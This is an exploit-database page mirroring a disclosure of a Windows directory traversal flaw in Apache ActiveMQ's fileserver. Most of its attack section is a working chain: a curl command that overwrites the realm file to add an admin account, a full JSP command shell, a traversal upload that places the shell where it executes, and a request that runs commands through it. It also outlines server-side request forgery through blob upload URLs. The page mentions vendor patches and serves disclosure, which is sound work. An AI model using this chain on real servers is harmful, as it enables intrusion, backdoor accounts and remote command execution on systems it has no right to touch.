Skip to content
cyberexploits
remotewindowstext

Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution

Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution

Publié le 2015-08-17

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/windows/remote/40857.txt7eac4c3a
raw
I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality. 

I have only been able to reproduce this on Windows, i.e. where "\" is a path delimiter. 

An attacker could use this flaw to upload arbitrary files to the server, including a JSP shell, leading to remote code execution.



Exploiting Windows systems to achieve RCE The default conf/jetty.xml includes:

 <bean class="org.eclipse.jetty.security.ConstraintMapping" id="securityConstraintMapping">  

     <property name="constraint" ref="securityConstraint">  

     <property name="pathSpec" value="/api/*,/admin/*,*.jsp">  

   </property></property>  

 </bean>  

Effectively blocking the upload of JSP files into contexts that will allow them to execute. 



I imagine there are many ways around this; for my proof of concept I opted to overwrite conf/jetty-realm.properties and set my own credentials:



$ cat jetty-realm.properties hacker: hacker, admin

$ curl -v -X PUT --data "@jetty-realm.properties" http://TARGET:8161/fileserver/..\\conf\\jetty-realm.properties



This seems to have the disadvantage of requiring a reboot of the server to take effect. 

I am not sure if that is always the case, but if so, I'm pretty sure there is some other workaround that wouldn't require a reboot. 

The attacker can then take a standard JSP shell:



$ cat cmd.jsp 

 <%@ page import="java.util.*,java.io.*"%>  

 <%  

 %>  

 <HTML><BODY>  

 Commands with JSP  

 <FORM METHOD="GET" NAME="myform" ACTION="">  

 <INPUT TYPE="text" NAME="cmd">  

 <INPUT TYPE="submit" VALUE="Send">  

 </FORM>  

 <pre>  

 <%  

 if (request.getParameter("cmd") != null) {  

 out.println("Command: " + request.getParameter("cmd") + "<BR>");  

 Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));  

 OutputStream os = p.getOutputStream();  

 InputStream in = p.getInputStream();  

 DataInputStream dis = new DataInputStream(in);  

 String disr = dis.readLine();  

 while ( disr != null ) {  

 out.println(disr);  

 disr = dis.readLine();  

 }  

 }  

 %>  

 </pre>  

 </BODY></HTML>  



Upload it, exploiting the "..\" directory traversal flaw to put it into an executable context:



$ curl -u 'hacker:hacker' -v -X PUT --data "@cmd.jsp" http://TARGET:8161/fileserver/..\\admin\\cmd.jsp



And pop a calc on the server:



$ curl -u 'hacker:hacker' -v -X GET http://TARGET:8161/admin/cmd.jsp?cmd=calc.exe



Exploiting non-Windows servers



All attempts at directory traversal on a Linux system failed - encoded, double encoded, and UTF-8 encoded "../" were all caught by Jetty. Only "..\" worked. 

That said, clients can specify the uploadUrl for a blob transfer, e.g.:



tcp://localhost:61616?jms.blobTransferPolicy.uploadUrl=http://foo.com



An attacker able to enqueue messages could use this to perform server side request forgery to an arbitrary uploadUrl target, even when running on non-Windows servers.



Resolution



The ActiveMQ project has released an advisory and patches. 

This is not the first instance of such a flaw in an open source Java application; CVE-2014-7816 comes to mind. 

It demonstrates that while Java may be platform independent, many developers are used to developing for a particular OS, and don't necessarily take cross-platform concerns into account.
Voir sur GitHub